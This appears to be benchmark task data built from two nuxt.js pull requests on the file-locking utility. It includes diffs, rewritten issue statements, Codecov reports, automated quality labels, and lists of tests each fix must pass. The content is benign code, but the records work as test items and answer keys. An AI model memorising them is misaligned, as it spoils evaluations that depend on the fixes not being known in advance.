Method: BuildContext.buildOptions Location: packages/builder/src/context/build.js → class BuildContext Inputs: None (getter property) Outputs: Returns the `build` object from the builder’s Nuxt options (`builder.nuxt.options.build`). Used to expose build configuration through the context. Description: Provides read‑only access to the Nuxt build options from a `BuildContext` instance. Called in tests to verify that the context forwards the builder’s build options. Function: PerfLoader(name, buildContext) Location: packages/webpack/src/utils/perf-loader.js → class PerfLoader Inputs: - `name` (string) – identifier for the loader instance. - `buildContext` (object) – the build context containing at least `options.dev` and `buildOptions` (e.g., `parallel`, `cache`). Outputs: - Creates a `PerfLoader` instance with `this.name`, `this.buildContext`, and `this.workerPools` (derived from `buildContext.options.dev`). - Provides a proxy that forwards unknown property accesses to `use(name)`. Description: Constructs a performance‑aware loader helper that configures thread‑loader pools based on the build’s dev mode and exposes loader shortcuts. Instantiated in tests with a mock context to verify pool creation and property access.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 9, "num_modified_lines": 175, "pr_author": "clarkdo", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.82, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue text only contains a generic PR template with no description of the desired changes, leaving the required behavior ambiguous. The test patch introduces new expectations (e.g., a BuildContext.buildOptions getter and renaming of context to buildContext) that are not mentioned in the issue, indicating a mismatch between the stated intent and the tests. This lack of clear specification signals an ambiguous specification problem, fitting B4. No other B‑category signals are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect a `buildOptions` getter on BuildContext which is not described in the issue", "Tests rename `builder.bundleBuilder.context` to `builder.bundleBuilder.buildContext` without specification" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": 
null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3153e89645cce9f487d745e42f189da53cb4faed
2019-03-21 19:59:34
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=h1) Report > Merging [#5320](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3153e89645cce9f487d745e42f189da53cb4faed?src=pr&el=desc) will **decrease** coverage by `0.03%`. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5320 +/- ## ========================================= - Coverage 95.7% 95.66% -0.04% ========================================= Files 74 74 Lines 2512 2514 +2 Branches 639 639 ========================================= + Hits 2404 2405 +1 - Misses 91 92 +1 Partials 17 17 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/utils/src/locking.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/diff?src=pr&el=tree#diff-cGFja2FnZXMvdXRpbHMvc3JjL2xvY2tpbmcuanM=) | `100% <100%> (ø)` | :arrow_up: | | [packages/vue-renderer/src/renderer.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/diff?src=pr&el=tree#diff-cGFja2FnZXMvdnVlLXJlbmRlcmVyL3NyYy9yZW5kZXJlci5qcw==) | `91.58% <0%> (-0.5%)` | :arrow_down: | | [packages/core/src/hookable.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5320/diff?src=pr&el=tree#diff-cGFja2FnZXMvY29yZS9zcmMvaG9va2FibGUuanM=) | `100% <0%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=footer). 
Last update [3153e89...abd7fb8](https://codecov.io/gh/nuxt/nuxt.js/pull/5320?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5320
diff --git a/packages/utils/src/locking.js b/packages/utils/src/locking.js index 68cc1a731..d0ee5f0f0 100644 --- a/packages/utils/src/locking.js +++ b/packages/utils/src/locking.js @@ -40,6 +40,7 @@ export async function lock({ id, dir, root, options }) { consola.fatal(`A lock with id '${id}' already exists on ${dir}`) } + options = getLockOptions(options) const release = await properlock.lock(lockPath, options) if (!release) {
fix: apply default lock options before setting lock <!--- Provide a general summary of your changes in the title above --> ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [x] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description <!--- Describe your changes in detail --> <!--- Why is this change required? What problem does it solve? --> <!--- If it resolves an open issue, please link to the issue here. For example "Resolves: #1337" --> As second / third time is the charm, now not only relax the lock settings but also really use them. Sorry :blush: ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [x] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing. Fixes: #5319
**Title** Apply default lock options before acquiring a lock **Problem** The locking utility was passing raw options directly to the underlying lock implementation, so default values were never applied. This could lead to unexpected lock timeouts or retries and cause intermittent failures. **Root Cause** The options object was not normalized through the helper that injects default lock settings before calling the lock function. **Fix / Expected Behavior** - Process incoming lock options through the default‑options helper prior to invoking the lock. - Ensure default values (e.g., stale time, retry count, timeout) are always respected when not explicitly provided. - Preserve existing custom option handling while adding the default processing step. - Keep the lock release semantics unchanged. - Added tests to confirm default options are applied correctly. **Risk & Validation** - Verify that custom options still behave identically after the change. - Run the full test suite, including the new tests covering default option handling. - Perform manual lock acquisition scenarios to ensure no regression in lock timing or release.
5,320
nuxt/nuxt.js
diff --git a/packages/utils/test/locking.test.js b/packages/utils/test/locking.test.js index 58dfcf5c4..225c64157 100644 --- a/packages/utils/test/locking.test.js +++ b/packages/utils/test/locking.test.js @@ -18,16 +18,16 @@ describe('util: locking', () => { beforeEach(() => jest.resetAllMocks()) beforeEach(() => lockPaths.clear()) - test('onCompromised lock is warn error by default', () => { + test('onCompromised lock warns on compromise by default', () => { defaultLockOptions.onCompromised() expect(consola.warn).toHaveBeenCalledTimes(1) }) test('can override default options', () => { - const options = getLockOptions({ onCompromised: err => consola.warn(err) }) + const options = getLockOptions({ onCompromised: err => consola.fatal(err) }) options.onCompromised() - expect(consola.warn).toHaveBeenCalledTimes(1) + expect(consola.fatal).toHaveBeenCalledTimes(1) }) test('createLockPath creates the same lockPath for identical locks', () => { @@ -143,4 +143,17 @@ describe('util: locking', () => { expect(fs.removeSync).toHaveBeenCalledWith(path1) expect(fs.removeSync).toHaveBeenCalledWith(path2) }) + + test('lock uses setLockOptions to set defaults', async () => { + const spy = properlock.lock.mockImplementationOnce(() => true) + + await lock(lockConfig) + + expect(spy).toHaveBeenCalledWith(expect.any(String), expect.any(Object)) + const options = spy.mock.calls[0][1] + expect(options.stale).toBeDefined() + expect(options.onCompromised).toBeDefined() + expect(() => options.onCompromised()).not.toThrow() + expect(consola.fatal).not.toHaveBeenCalled() + }) })
[ "lock uses setLockOptions to set defaults" ]
[ "should construct context", "should return builder plugins context", "should return builder build options", "should export Module, Nuxt and Resolver", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should get context with req and res", "should get correct globals", "should export Generator", "should export getDefaultNuxtConfig and getNuxtConfig", "should export Builder", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should list all commands", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should return globals with given globalName", "should export Server and Listener", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute http url", "should compute https url", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening", "should return modern middleware", "should not detect modern build 
if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should return dev filenames", "should return prod filenames", "should return modern filenames", "onCompromised lock warns on compromise by default", "can override default options", "createLockPath creates the same lockPath for identical locks", "createLockPath creates unique lockPaths for different ids", "createLockPath creates unique lockPaths for different dirs", "createLockPath creates unique lockPaths for different roots", "getLockPath creates lockPath when it doesnt exists", "lock creates a lock and returns a release fn", "lock throws error when lock already exists", "lock logs warning when it couldnt get a lock", "lock returns a release method for unlocking both lockfile as lockPath", "lock release also cleansup onExit set", "lock sets exit listener once to remove lockPaths", "exit listener removes all lockPaths when called", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize internal function", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should export all methods from utils folder", "should flat route with path", "should ignore route with * and :", "should resolve route with /", "should guard parent dir", "should guard same dir", "should not guard same level dir", "should not guard same level dir - 2", "should not guard child dir", "should 
promisify array routes", "should promisify functional routes", "should promisify promisable functional routes", "should promisify promisable functional routes with arguments", "should promisify functional routes with error", "should promisify functional routes with arguments and error", "should promisify functional routes with result", "should promisify functional routes with arguments and result", "createRoutes should allow snake case routes in posix system", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "timeout (promise)", "timeout (async function)", "timeout (timeout in 100ms)", "timeout (async timeout in 100ms)", "waitFor", "should construct Timer", "should create new time record", "should stop and remove time record", "should be quiet if end with nonexistent time", "should use bigint hrtime if supports", "should calculate duration with bigint hrtime", "should use hrtime if bigint it not supported", "should calculate duration with hrtime", "should clear all times", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading 
source", "should return if fileName is unknown when read source" ]
Method: defaultLockOptions.onCompromised() Location: exported constant `defaultLockOptions` in **packages/utils/src/locking.js** (used directly in tests) Inputs: none (the method is bound to the default options object) Outputs: calls `consola.warn` (or the overridden handler) – does not throw by default Description: Default handler invoked when a lock is detected as compromised; can be overridden via lock options. Function: getLockOptions(customOptions?) Location: exported function in **packages/utils/src/locking.js**, called by tests and internally by `lock` Inputs: - `customOptions` (optional Object) – may contain `onCompromised`, `stale`, and other proper‑lock options. Outputs: - Returns a new options object that merges `defaultLockOptions` with any supplied `customOptions`. Guarantees that `onCompromised` and `stale` fields are defined (fallback to defaults if omitted). Description: Normalises lock configuration by applying default behaviours before the lock is created. Function: lock({ id, dir, root, options }) Location: exported async function in **packages/utils/src/locking.js** Inputs: - `id` (string) – identifier of the lock. - `dir` (string) – directory where the lock file will be placed. - `root` (string) – base path used to compute the lock file location. - `options` (optional Object) – custom lock options; will be passed through `getLockOptions` to ensure defaults. Outputs: - Returns the release function from `properlock.lock` (or `true` in mocked tests). May throw a fatal error if a lock with the same `id` already exists. Description: Acquires a filesystem lock using `properlock.lock`, first applying default lock options (including `stale` and `onCompromised`). The test verifies that the merged options are supplied to the underlying lock implementation and that the default `onCompromised` handler does not raise exceptions.
MIT
{ "base_image_name": "node_16", "install": [ "sed -i '/\"packageManager\":/d' package.json", "npm install --prefer-offline --no-audit --progress=false --ignore-scripts --legacy-peer-deps", "npx lerna link", "npx jiti ./scripts/pkg.js" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --forceExit --verbose --silent --passWithNoTests packages/" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "pimlie", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue aims to ensure default lock options are applied before acquiring a lock. The added test checks that the lock function calls the underlying library with an options object that includes the defaults and that the onCompromised handler is safe, matching the described fix. No test assertions introduce requirements beyond the issue, and there are no external dependencies or naming expectations not covered by the repo. Therefore the task is well‑specified and solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3c50876d737ced86f2e3677c1ee7be6328dcdcc9
2019-03-22 19:21:14
codecov-io: # [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=h1) Report > Merging [#5347](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=desc) into [dev](https://codecov.io/gh/nuxt/nuxt.js/commit/3c50876d737ced86f2e3677c1ee7be6328dcdcc9?src=pr&el=desc) will **decrease** coverage by `44.73%`. > The diff coverage is `0%`. [![Impacted file tree graph](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/graphs/tree.svg?width=650&token=nGD1PtMB3M&height=150&src=pr)](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## dev #5347 +/- ## =========================================== - Coverage 95.66% 50.92% -44.74% =========================================== Files 74 74 Lines 2513 2529 +16 Branches 639 641 +2 =========================================== - Hits 2404 1288 -1116 - Misses 92 962 +870 - Partials 17 279 +262 ``` | [Impacted Files](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [packages/utils/src/locking.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvdXRpbHMvc3JjL2xvY2tpbmcuanM=) | `4.76% <0%> (-95.24%)` | :arrow_down: | | [packages/generator/src/generator.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvZ2VuZXJhdG9yL3NyYy9nZW5lcmF0b3IuanM=) | `0% <0%> (-100%)` | :arrow_down: | | [packages/typescript/src/index.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvdHlwZXNjcmlwdC9zcmMvaW5kZXguanM=) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/index.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9pbmRleC5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/options/server.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9vcHRpb25zL3NlcnZlci5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | 
[packages/cli/src/run.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9ydW4uanM=) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/commands/start.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9jb21tYW5kcy9zdGFydC5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/commands/generate.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9jb21tYW5kcy9nZW5lcmF0ZS5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/options/common.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy9vcHRpb25zL2NvbW1vbi5qcw==) | `0% <0%> (-100%)` | :arrow_down: | | [packages/cli/src/utils/constants.js](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree#diff-cGFja2FnZXMvY2xpL3NyYy91dGlscy9jb25zdGFudHMuanM=) | `0% <0%> (-100%)` | :arrow_down: | | ... and [40 more](https://codecov.io/gh/nuxt/nuxt.js/pull/5347/diff?src=pr&el=tree-more) | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=footer). Last update [3c50876...c713b3f](https://codecov.io/gh/nuxt/nuxt.js/pull/5347?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
nuxt__nuxt.js-5347
diff --git a/packages/utils/src/locking.js b/packages/utils/src/locking.js index d0ee5f0f0..c9b7fc15b 100644 --- a/packages/utils/src/locking.js +++ b/packages/utils/src/locking.js @@ -35,16 +35,33 @@ export async function getLockPath(config) { export async function lock({ id, dir, root, options }) { const lockPath = await getLockPath({ id, dir, root }) - const locked = await properlock.check(lockPath) - if (locked) { - consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + try { + const locked = await properlock.check(lockPath) + if (locked) { + consola.fatal(`A lock with id '${id}' already exists on ${dir}`) + } + } catch (e) { + consola.debug(`Check for an existing lock with id '${id}' on ${dir} failed`, e) } - options = getLockOptions(options) - const release = await properlock.lock(lockPath, options) + let lockWasCompromised = false + let release + + try { + options = getLockOptions(options) + + const onCompromised = options.onCompromised + options.onCompromised = (err) => { + onCompromised(err) + lockWasCompromised = true + } + + release = await properlock.lock(lockPath, options) + } catch (e) {} if (!release) { consola.warn(`Unable to get a lock with id '${id}' on ${dir} (but will continue)`) + return false } if (!lockPaths.size) { @@ -59,8 +76,27 @@ export async function lock({ id, dir, root, options }) { lockPaths.add(lockPath) return async function lockRelease() { - await release() - await fs.remove(lockPath) - lockPaths.delete(lockPath) + try { + await fs.remove(lockPath) + lockPaths.delete(lockPath) + + // release as last so the lockPath is still removed + // when it fails on a compromised lock + await release() + } catch (e) { + if (!lockWasCompromised || !e.message.includes('already released')) { + consola.debug(e) + return + } + + // proper-lockfile doesnt remove lockDir when lock is compromised + // removing it here could cause the 'other' process to throw an error + // as well, but in our case its much more likely the lock was + // 
compromised due to mtime update timeouts + const lockDir = `${lockPath}.lock` + if (await fs.exists(lockDir)) { + await fs.remove(lockDir) + } + } } }
fix(cli): catch all possible errors thrown from proper-filelock <!--- Provide a general summary of your changes in the title above --> ![image](https://user-images.githubusercontent.com/1067403/54847600-111c5c00-4cdf-11e9-87c3-d473bda3c054.png) ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [x] Bug fix (a non-breaking change which fixes an issue) - [ ] New feature (a non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Description <!--- Describe your changes in detail --> <!--- Why is this change required? What problem does it solve? --> <!--- If it resolves an open issue, please link to the issue here. For example "Resolves: #1337" --> Ref: #5324 Although I could have expected it maybe, its not really documented that proper-lockfile also throws errors when it cant release a lock. This pr should fix that behaviour by wrapping any code which originates from proper-lockfile in a `try/catch` and warn when an error was thrown. The _only_ time a lock should result in a `Nuxt Fatal Error` is when a lock with the same id already exists. ## Checklist: <!--- Put an `x` in all the boxes that apply. --> <!--- If your change requires a documentation PR, please link it appropriately --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. (PR: #) - [x] I have added tests to cover my changes (if not applicable, please state why) - [ ] All new and existing tests are passing.
**Title** Robust handling of lock‑related errors in the utils locking module **Problem** The locking utility relied on a third‑party lock library that can throw exceptions during lock checks, acquisition, and release. These uncaught errors caused the CLI to terminate unexpectedly, even when the lock situation was recoverable. **Root Cause** Exceptions from the external lock library were not intercepted, and compromised lock states were not cleaned up, leading to fatal failures and stale lock artifacts. **Fix / Expected Behavior** - Guard all interactions with the lock library in defensive error handling. - Log unexpected errors at a debug level instead of crashing the process. - Treat only the case of an existing lock with the same identifier as a fatal error. - Gracefully fail when a lock cannot be obtained, emitting a warning and allowing execution to continue. - Ensure lock release removes lock files and cleans up compromised lock directories without propagating errors. **Risk & Validation** - Verify that normal lock acquisition and release continue to work unchanged. - Confirm that duplicate‑lock scenarios still abort with a clear fatal message. - Run the existing test suite and add tests covering error paths to ensure no regressions.
5,347
nuxt/nuxt.js
diff --git a/packages/utils/test/locking.test.js b/packages/utils/test/locking.test.js index 225c64157..52acfd6dd 100644 --- a/packages/utils/test/locking.test.js +++ b/packages/utils/test/locking.test.js @@ -61,7 +61,7 @@ describe('util: locking', () => { }) test('lock creates a lock and returns a release fn', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) const fn = await lock(lockConfig) @@ -75,7 +75,7 @@ describe('util: locking', () => { }) test('lock throws error when lock already exists', async () => { - properlock.check.mockImplementationOnce(() => true) + properlock.check.mockReturnValue(true) await lock(lockConfig) expect(properlock.check).toHaveBeenCalledTimes(1) @@ -84,7 +84,19 @@ describe('util: locking', () => { }) test('lock logs warning when it couldnt get a lock', async () => { - properlock.lock.mockImplementationOnce(() => false) + properlock.lock.mockReturnValue(false) + + const fn = await lock(lockConfig) + expect(fn).toBe(false) + expect(properlock.lock).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledTimes(1) + expect(consola.warn).toHaveBeenCalledWith(`Unable to get a lock with id '${lockConfig.id}' on ${lockConfig.dir} (but will continue)`) + }) + + test('lock logs warning when proper.lock threw error', async () => { + properlock.lock.mockImplementation(() => { + throw new Error('test error') + }) await lock(lockConfig) expect(properlock.lock).toHaveBeenCalledTimes(1) @@ -94,7 +106,7 @@ describe('util: locking', () => { test('lock returns a release method for unlocking both lockfile as lockPath', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() => release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) await fn() @@ -105,7 +117,7 @@ describe('util: locking', () => { test('lock release also cleansup onExit set', async () => { const release = jest.fn() - properlock.lock.mockImplementationOnce(() 
=> release) + properlock.lock.mockImplementation(() => release) const fn = await lock(lockConfig) expect(lockPaths.size).toBe(1) @@ -114,8 +126,58 @@ describe('util: locking', () => { expect(lockPaths.size).toBe(0) }) + test('lock release only logs error when error thrown', async () => { + const release = jest.fn(() => { + throw new Error('test error') + }) + properlock.lock.mockImplementation(() => release) + + const fn = await lock(lockConfig) + await expect(fn()).resolves.not.toThrow() + + expect(consola.debug).toHaveBeenCalledTimes(1) + }) + + test('lock check only logs error when error thrown', async () => { + const testError = new Error('check error') + properlock.lock.mockImplementation(() => () => {}) + properlock.check.mockImplementation(() => { + throw testError + }) + + const fn = await lock(lockConfig) + expect(fn).toEqual(expect.any(Function)) + + expect(consola.debug).toHaveBeenCalledTimes(1) + expect(consola.debug).toHaveBeenCalledWith(`Check for an existing lock with id '${lockConfig.id}' on ${lockConfig.dir} failed`, testError) + }) + + test('lock release doesnt log error when error thrown because lock compromised', async () => { + fs.exists.mockReturnValue(true) + const testError = new Error('Lock is already released') + const release = jest.fn(() => { + throw testError + }) + + properlock.lock.mockImplementation((path, options) => { + options.onCompromised() + return release + }) + + const fn = await lock({ + ...lockConfig, + options: { + // overwrite default compromised which calls consola.warn + onCompromised() {} + } + }) + + await expect(fn()).resolves.not.toThrow() + expect(consola.warn).not.toHaveBeenCalled() + }) + test('lock sets exit listener once to remove lockPaths', async () => { - properlock.lock.mockImplementationOnce(() => true) + properlock.lock.mockReturnValue(true) await lock(lockConfig) await lock(lockConfig) @@ -124,8 +186,10 @@ describe('util: locking', () => { }) test('exit listener removes all lockPaths when called', async 
() => { + properlock.lock.mockReturnValue(true) + let callback - onExit.mockImplementationOnce(cb => (callback = cb)) + onExit.mockImplementation(cb => (callback = cb)) const lockConfig2 = Object.assign({}, lockConfig, { id: 'id2' }) @@ -145,7 +209,7 @@ describe('util: locking', () => { }) test('lock uses setLockOptions to set defaults', async () => { - const spy = properlock.lock.mockImplementationOnce(() => true) + const spy = properlock.lock.mockReturnValue(true) await lock(lockConfig)
[ "lock logs warning when it couldnt get a lock", "lock logs warning when proper.lock threw error", "lock release only logs error when error thrown", "lock check only logs error when error thrown", "lock release doesnt log error when error thrown because lock compromised" ]
[ "should export Builder", "should get context with req and res", "should get correct globals", "should export Server and Listener", "should construct context", "should export getDefaultNuxtConfig and getNuxtConfig", "should return false in default shouldPrefetch", "should return true in script/style shouldPreload", "should return false in other shouldPreload", "should return globals with given globalName", "should list all commands", "should check if given argument is string", "should check if given argument is empty string", "should check if given argument is pure object", "should check if given argument is url", "should wrap given argument with array", "should strip white spaces in given argument", "should encode html", "should join url", "should export Module, Nuxt and Resolver", "should export Generator", "should return server configurations with NUXT_* env", "should return server configurations with env", "should return server configurations with npm_* env", "should construct listener", "should listen http host and port", "should listen https host and port", "should listen unix socket host and port", "should prevent listening multiple times", "should throw error if error occurred or listen failed", "should compute http url", "should compute https url", "should compute unix socket url", "should throw error in serverErrorHandler", "should throw address in use error", "should throw address in use error for socket", "should fallback to a random port in address in use error", "should close server", "should prevent destroying server if server is not listening", "should return builder plugins context", "should return builder build options", "should import relative module", "should import core module", "should print error when module not found", "should throw error when error is not module not found", "should serialize normal function", "should serialize shorthand function", "should serialize arrow function", "should not replace custom scripts", "should serialize 
internal function", "should check if path starts with alias", "should check if path starts with root alias", "should check if path starts with src alias", "should return same path in linux", "should define alias", "should check if given argument is index file or folder", "should return main module", "should resolve alias path", "should keep webpack inline loaders prepended", "should check path which is not started with alias", "should return default nuxt configurations", "should return nuxt configurations with custom env", "should construct Ignore", "should add ignore file", "should find ignore file", "should only find existed ignore file", "should filter ignore files", "should return origin paths if there is no ignorefile", "should reload ignore", "should call fn in sequence", "should call fn in parallel", "chainFn (mutate, mutate)", "chainFn (mutate, return)", "chainFn (return, mutate)", "chainFn (return, return)", "chainFn (return, non-function)", "chainFn (non-function, return)", "should return error middleware", "should send html error response", "should send json error response", "should send html error response by youch in debug mode", "should send json error response by youch in debug mode", "should search all possible paths when read source", "should return source content after read source", "should return relative fileName if fileName is absolute path", "should ignore error when reading source", "should return if fileName is unknown when read source", "should return modern middleware", "should not detect modern build if modern mode is specified", "should detect client modern build and display message", "should detect server modern build and display message", "should not detect modern browser if modern build is not found", "should not detect modern browser if connect has been detected", "should detect modern browser based on user-agent", "should detect legacy browser based on user-agent", "should ignore illegal user-agent", "should flat route with path", 
